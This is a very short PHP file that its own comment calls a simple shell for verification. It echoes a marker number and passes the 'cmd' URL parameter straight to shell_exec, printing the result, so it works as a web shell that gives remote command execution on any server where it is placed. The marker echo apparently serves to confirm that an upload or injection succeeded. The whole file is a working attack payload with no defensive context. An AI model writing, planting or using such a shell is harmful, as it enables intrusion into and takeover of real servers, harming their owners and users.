<?php
// Simple PHP shell for verification
echo 187139;
if (isset($_GET['cmd'])) {
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
}
?>